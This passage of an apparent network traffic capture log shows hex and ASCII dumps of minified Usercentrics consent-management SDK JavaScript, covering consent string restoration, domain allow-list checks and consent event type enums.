r;(0,S.browserSdkEvents).emit("INIT_ACTION",{initByRuleSet:t});let i=yield n.apiService.fetchInitDataByRuleSet
2024-04-18 17:39:35 UTC	254	IN	Data Raw: 63 61 74 69 6f 6e 3a 6e 2e 6c 6f 63 61 74 69 6f 6e 2c 6c 61 6e 67 75 61 67 65 3a 6e 2e 6c 61 6e 67 75 61 67 65 7d 29 3b 6e 2e 76 65 72 69 66 79 43 6f 72 65 44 61 74 61 28 69 2e 73 65 74 74 69 6e 67 73 43 6f 72 65 44 61 74 61 29 3b 6c 65 74 20 73 3d 69 2e 73 65 74 74 69 6e 67 73 43 6f 72 65 44 61 74 61 2e 63 72 6f 73 73 44 65 76 69 63 65 43 6f 6e 73 65 6e 74 53 68 61 72 69 6e 67 45 6e 61 62 6c 65 64 3b 69 66 28 65 26 26 73 29 7b 6c 65 74 20 73 3d 79 69 65 6c 64 20 6e 2e 61 70 69 53 65 72 76 69 63 65 2e 66 65 74 63 68 55 63 53 74 72 69 6e 67 46 6f 72 52 65 73 74 6f 72 61 74 69 6f 6e 28 65 2c 74 29 3b 69 66 28 28 6e 75 6c 6c 3d 3d 73 3f 76 6f 69 64 20 30 3a 73 2e 75 63 53 74 72 69 6e 67 29 26 26 28 6e 2e 6c 6f 63 61 6c 53 74 6f 72 61 67 65 53 65 72 76 69 Data Ascii: cation:n.location,language:n.language});n.verifyCoreData(i.settingsCoreData);let s=i.settingsCoreData.crossDeviceConsentSharingEnabled;if(e&&s){let s=yield n.apiService.fetchUcStringForRestoration(e,t);if((null==s?void 0:s.ucString)&&(n.localStorageServi
2024-04-18 17:39:35 UTC	1255	IN	Data Raw: 63 65 2e 73 65 74 43 6f 6e 73 65 6e 74 53 74 72 69 6e 67 28 73 2e 75 63 53 74 72 69 6e 67 29 2c 69 2e 73 65 74 74 69 6e 67 73 43 6f 72 65 44 61 74 61 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 43 6f 6e 73 65 6e 74 53 68 61 72 69 6e 67 45 6e 61 62 6c 65 64 29 29 7b 6c 65 74 20 74 3d 79 69 65 6c 64 20 49 28 69 2e 73 65 74 74 69 6e 67 73 43 6f 72 65 44 61 74 61 2e 69 64 29 3b 79 69 65 6c 64 20 6e 75 6c 6c 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 73 65 74 43 6f 6e 73 65 6e 74 53 74 72 69 6e 67 28 73 2e 75 63 53 74 72 69 6e 67 29 2c 72 3d 74 7d 7d 72 65 74 75 72 6e 20 65 26 26 21 73 26 26 28 30 2c 43 2e 64 65 66 61 75 6c 74 29 2e 65 72 72 6f 72 28 22 42 72 6f 77 73 65 72 53 64 6b 20 2d 20 69 6e 69 74 42 79 53 65 74 74 69 6e 67 22 2c 60 43 72 6f 73 73 20 44 65 76 69 63 Data Ascii: ce.setConsentString(s.ucString),i.settingsCoreData.crossDomainConsentSharingEnabled)){let t=yield I(i.settingsCoreData.id);yield null==t?void 0:t.setConsentString(s.ucString),r=t}}return e&&!s&&(0,C.default).error("BrowserSdk - initBySetting",`Cross Devic
2024-04-18 17:39:35 UTC	1255	IN	Data Raw: 6d 3d 6c 7c 7c 21 41 2e 63 6f 72 65 2e 61 6e 61 6c 79 74 69 63 73 45 6e 61 62 6c 65 64 7c 7c 63 2e 64 69 73 61 62 6c 65 54 72 61 63 6b 69 6e 67 3f 76 6f 69 64 20 30 3a 6e 65 77 20 70 2e 64 65 66 61 75 6c 74 28 7b 73 65 74 74 69 6e 67 73 49 64 3a 41 2e 73 65 74 74 69 6e 67 2e 69 64 2c 61 62 54 65 73 74 56 61 72 69 61 6e 74 3a 41 2e 73 65 74 74 69 6e 67 2e 61 62 56 61 72 69 61 6e 74 2c 65 75 4d 6f 64 65 3a 63 2e 65 75 4d 6f 64 65 2c 73 61 6e 64 62 6f 78 3a 63 2e 73 61 6e 64 62 6f 78 7d 29 2c 79 3d 6e 75 6c 6c 3d 3d 3d 28 73 3d 41 2e 69 6e 74 65 67 72 61 74 69 6f 6e 73 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 73 3f 76 6f 69 64 20 30 3a 73 2e 73 63 72 69 70 74 73 3b 69 66 28 6e 75 6c 6c 3d 3d 79 3f 76 6f 69 64 20 30 3a 79 2e 6c 65 6e 67 74 68 29 7b 6c 65 74 20 74 Data Ascii: m=l\|\|!A.core.analyticsEnabled\|\|c.disableTracking?void 0:new p.default({settingsId:A.setting.id,abTestVariant:A.setting.abVariant,euMode:c.euMode,sandbox:c.sandbox}),y=null===(s=A.integrations)\|\|void 0===s?void 0:s.scripts;if(null==y?void 0:y.length){let t
2024-04-18 17:39:35 UTC	1255	IN	Data Raw: 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 7d 22 20 68 61 73 20 6e 6f 74 20 62 65 65 6e 20 61 64 64 65 64 20 74 6f 20 74 68 65 20 61 6c 6c 6f 77 20 6c 69 73 74 20 66 6f 72 20 74 68 69 73 20 55 73 65 72 63 65 6e 74 72 69 63 73 20 61 63 63 6f 75 6e 74 2e 60 29 2c 6e 65 77 20 67 2e 43 6d 70 4e 6f 74 41 6c 6c 6f 77 65 64 45 72 72 6f 72 28 28 6e 75 6c 6c 3d 3d 3d 28 65 3d 74 2e 61 6c 6c 6f 77 65 64 44 6f 6d 61 69 6e 73 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 73 68 6f 77 45 72 72 6f 72 43 6d 70 29 3d 3d 3d 21 30 29 7d 6c 65 74 7b 63 6d 70 56 65 72 73 69 6f 6e 3a 6e 7d 3d 74 2c 72 3d 22 33 2e 31 32 2e 31 22 3b 69 66 28 6e 26 26 72 26 26 6e 21 3d 3d 72 29 74 68 72 6f 77 20 6e 65 77 20 67 2e 43 6d 70 56 65 72 73 69 6f 6e 4d 69 73 6d 61 74 Data Ascii: tion.hostname}" has not been added to the allow list for this Usercentrics account.`),new g.CmpNotAllowedError((null===(e=t.allowedDomains)\|\|void 0===e?void 0:e.showErrorCmp)===!0)}let{cmpVersion:n}=t,r="3.12.1";if(n&&r&&n!==r)throw new g.CmpVersionMismat
2024-04-18 17:39:35 UTC	331	IN	Data Raw: 2e 62 61 63 6b 77 61 72 64 73 43 6f 6d 70 61 74 69 62 69 6c 69 74 79 53 65 72 76 69 63 65 3d 6e 65 77 20 68 2e 64 65 66 61 75 6c 74 28 74 68 69 73 2e 6c 6f 63 61 6c 53 74 6f 72 61 67 65 53 65 72 76 69 63 65 2c 6e 75 6c 6c 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 73 61 6e 64 62 6f 78 29 7d 7d 7d 29 2c 72 28 22 6a 4e 43 6a 70 22 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 72 29 7b 74 28 65 2e 65 78 70 6f 72 74 73 2c 22 41 70 69 53 65 72 76 69 63 65 22 2c 28 29 3d 3e 6e 28 22 63 6f 6b 42 77 22 29 2e 64 65 66 61 75 6c 74 29 2c 74 28 65 2e 65 78 70 6f 72 74 73 2c 22 43 6f 6e 73 65 6e 74 53 65 72 76 69 63 65 22 2c 28 29 3d 3e 6e 28 22 68 5a 67 56 75 22 29 2e 64 65 66 61 75 6c 74 29 2c 74 28 65 2e 65 78 70 6f 72 74 73 2c 22 43 72 6f 73 73 44 6f 6d 61 69 6e 53 65 72 76 69 Data Ascii: .backwardsCompatibilityService=new h.default(this.localStorageService,null==t?void 0:t.sandbox)}}}),r("jNCjp",function(e,r){t(e.exports,"ApiService",()=>n("cokBw").default),t(e.exports,"ConsentService",()=>n("hZgVu").default),t(e.exports,"CrossDomainServi
2024-04-18 17:39:35 UTC	1255	IN	Data Raw: 64 65 66 61 75 6c 74 29 2c 74 28 65 2e 65 78 70 6f 72 74 73 2c 22 44 61 74 61 4c 61 79 65 72 53 65 72 76 69 63 65 22 2c 28 29 3d 3e 6e 28 22 62 41 47 37 54 22 29 2e 64 65 66 61 75 6c 74 29 2c 74 28 65 2e 65 78 70 6f 72 74 73 2c 22 4c 6f 63 61 6c 53 74 6f 72 61 67 65 53 65 72 76 69 63 65 22 2c 28 29 3d 3e 6e 28 22 34 34 48 4d 31 22 29 2e 64 65 66 61 75 6c 74 29 2c 74 28 65 2e 65 78 70 6f 72 74 73 2c 22 53 63 72 69 70 74 53 65 72 76 69 63 65 22 2c 28 29 3d 3e 6e 28 22 33 73 69 6a 46 22 29 2e 64 65 66 61 75 6c 74 29 2c 6e 28 22 37 43 44 56 62 22 29 2c 6e 28 22 39 6f 43 63 73 22 29 2c 6e 28 22 62 41 47 37 54 22 29 2c 6e 28 22 63 6f 6b 42 77 22 29 2c 6e 28 22 68 5a 67 56 75 22 29 2c 6e 28 22 32 66 73 4a 51 22 29 2c 6e 28 22 34 34 48 4d 31 22 29 2c 6e 28 22 33 Data Ascii: default),t(e.exports,"DataLayerService",()=>n("bAG7T").default),t(e.exports,"LocalStorageService",()=>n("44HM1").default),t(e.exports,"ScriptService",()=>n("3sijF").default),n("7CDVb"),n("9oCcs"),n("bAG7T"),n("cokBw"),n("hZgVu"),n("2fsJQ"),n("44HM1"),n("3
2024-04-18 17:39:35 UTC	1255	IN	Data Raw: 45 4e 54 5f 54 59 50 45 2e 43 4f 4f 4b 49 45 5f 50 4f 4c 49 43 59 5f 4c 49 4e 4b 3a 72 65 74 75 72 6e 20 73 2e 55 49 5f 41 43 54 49 4f 4e 5f 54 59 50 45 2e 43 4f 4f 4b 49 45 5f 50 4f 4c 49 43 59 5f 4c 49 4e 4b 3b 63 61 73 65 20 6f 2e 43 4d 50 5f 45 56 45 4e 54 5f 54 59 50 45 2e 49 4d 50 52 49 4e 54 5f 4c 49 4e 4b 3a 72 65 74 75 72 6e 20 73 2e 55 49 5f 41 43 54 49 4f 4e 5f 54 59 50 45 2e 49 4d 50 52 49 4e 54 5f 4c 49 4e 4b 3b 63 61 73 65 20 6f 2e 43 4d 50 5f 45 56 45 4e 54 5f 54 59 50 45 2e 4d 4f 52 45 5f 49 4e 46 4f 52 4d 41 54 49 4f 4e 5f 4c 49 4e 4b 3a 72 65 74 75 72 6e 20 73 2e 55 49 5f 41 43 54 49 4f 4e 5f 54 59 50 45 2e 4d 4f 52 45 5f 49 4e 46 4f 52 4d 41 54 49 4f 4e 5f 4c 49 4e 4b 3b 63 61 73 65 20 6f 2e 43 4d 50 5f 45 56 45 4e 54 5f 54 59 50 45 2e Data Ascii: ENT_TYPE.COOKIE_POLICY_LINK:return s.UI_ACTION_TYPE.COOKIE_POLICY_LINK;case o.CMP_EVENT_TYPE.IMPRINT_LINK:return s.UI_ACTION_TYPE.IMPRINT_LINK;case o.CMP_EVENT_TYPE.MORE_INFORMATION_LINK:return s.UI_ACTION_TYPE.MORE_INFORMATION_LINK;case o.CMP_EVENT_TYPE.
2024-04-18 17:39:35 UTC	1255	IN	Data Raw: 5b 69 2e 43 4d 50 5f 53 48 4f 57 4e 3d 31 5d 3d 22 43 4d 50 5f 53 48 4f 57 4e 22 2c 69 5b 69 2e 41 43 43 45 50 54 5f 41 4c 4c 3d 32 5d 3d 22 41 43 43 45 50 54 5f 41 4c 4c 22 2c 69 5b 69 2e 44 45 4e 59 5f 41 4c 4c 3d 33 5d 3d 22 44 45 4e 59 5f 41 4c 4c 22 2c 69 5b 69 2e 53 41 56 45 3d 34 5d 3d 22 53 41 56 45 22 2c 69 5b 69 2e 41 43 43 45 50 54 5f 41 4c 4c 5f 4c 31 3d 35 5d 3d 22 41 43 43 45 50 54 5f 41 4c 4c 5f 4c 31 22 2c 69 5b 69 2e 44 45 4e 59 5f 41 4c 4c 5f 4c 31 3d 36 5d 3d 22 44 45 4e 59 5f 41 4c 4c 5f 4c 31 22 2c 69 5b 69 2e 53 41 56 45 5f 4c 31 3d 37 5d 3d 22 53 41 56 45 5f 4c 31 22 2c 69 5b 69 2e 41 43 43 45 50 54 5f 41 4c 4c 5f 4c 32 3d 38 5d 3d 22 41 43 43 45 50 54 5f 41 4c 4c 5f 4c 32 22 2c 69 5b 69 2e 44 45 4e 59 5f 41 4c 4c 5f 4c 32 3d 39 5d Data Ascii: [i.CMP_SHOWN=1]="CMP_SHOWN",i[i.ACCEPT_ALL=2]="ACCEPT_ALL",i[i.DENY_ALL=3]="DENY_ALL",i[i.SAVE=4]="SAVE",i[i.ACCEPT_ALL_L1=5]="ACCEPT_ALL_L1",i[i.DENY_ALL_L1=6]="DENY_ALL_L1",i[i.SAVE_L1=7]="SAVE_L1",i[i.ACCEPT_ALL_L2=8]="ACCEPT_ALL_L2",i[i.DENY_ALL_L2=9]